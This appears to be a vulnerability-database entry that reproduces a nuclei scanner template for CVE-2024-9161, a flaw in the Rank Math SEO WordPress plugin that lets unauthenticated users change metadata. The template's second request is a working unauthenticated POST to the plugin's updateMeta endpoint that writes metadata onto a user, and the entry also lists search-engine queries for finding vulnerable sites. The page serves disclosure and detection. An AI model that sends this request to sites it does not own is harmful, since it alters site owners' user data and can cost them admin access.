Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion

02 Jul 2026 09:36:57 | Reported by ProjectDiscovery | Type: nuclei | Source: github.com

Rank Math SEO plugin up to 1.0.228 lets unauthenticated users insert, update, or delete user and term metadata; upgrade to 1.0.229.

id: CVE-2024-9161

info:
  name: Rank Math SEO < 1.0.229 - Unauthenticated User and Term Metadata Insert/Update/Deletion
  author: Kazgangap
  severity: medium
  description: |
    Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress contains a missing capability check on 'update_metadata' in all versions up to 1.0.228, letting unauthenticated attackers insert, update, or delete metadata, including user and term metadata, potentially causing loss of access to the admin dashboard.
  impact: |
    Unauthenticated attackers can modify or delete metadata, leading to data loss and potential denial of access to the admin dashboard.
  remediation: |
    Update to version 1.0.229 or later.
  reference:
    - https://wpscan.com/vulnerability/95be2559-f0e2-4e98-9bef-3989df0d25bf/
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L120
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L161
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L162
    - https://plugins.trac.wordpress.org/browser/seo-by-rank-math/trunk/includes/rest/class-shared.php#L64
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L
    cvss-score: 6.5
    cve-id: CVE-2024-9161
    cwe-id: CWE-862
    epss-score: 0.02045
    epss-percentile: 0.78813
    cpe: cpe:2.3:a:rankmath:seo:*:*:*:*:free:wordpress:*:*
  metadata:
    verified: true
    max-request: 2
    vendor: rankmath
    product: seo
    framework: wordpress
    shodan-query: http.html:"/wp-content/plugins/seo-by-rank-math/"
    fofa-query: body="/wp-content/plugins/seo-by-rank-math/"
    publicwww-query: "/wp-content/plugins/seo-by-rank-math/"
  tags: cve,cve2024,wordpress,seo-by-rank-math,wp-plugin,wpscan,rankmath,intrusive,vkev

variables:
  objectid: "{{rand_int(1,9)}}"
  data: "meta_{{to_lower(rand_text_alpha(12))}}"

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /wp-content/plugins/seo-by-rank-math/readme.txt HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains(body, "Rank Math")'
        condition: and
        internal: true

  - raw:
      - |
        POST /wp-json/rankmath/v1/updateMeta HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json

        {
          "objectType": "user",
          "objectID": {{objectid}},
          "meta": {
            "{{data}}": "{{data}}"
          }
        }

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body,"slug", "true", "schemas")'
          - 'contains(content_type, "application/json")'
          - "status_code == 200"
        condition: and
# digest: 4a0a004730450220161ba04fccf9e58b9f4da79c1e91d027d1bfa664764925012c93bd67d7c64611022100fb17a8db12d7516017c9bb100eb0cacab37be89ef3233747271a5c312b3da253:922c64590222798bb761d5b6d8e72950

04 Feb 2026 07:00 (Current)
Vulners AI Score: 5.7 (Medium risk)
CVSS 3.1: 6.5
EPSS: 0.02045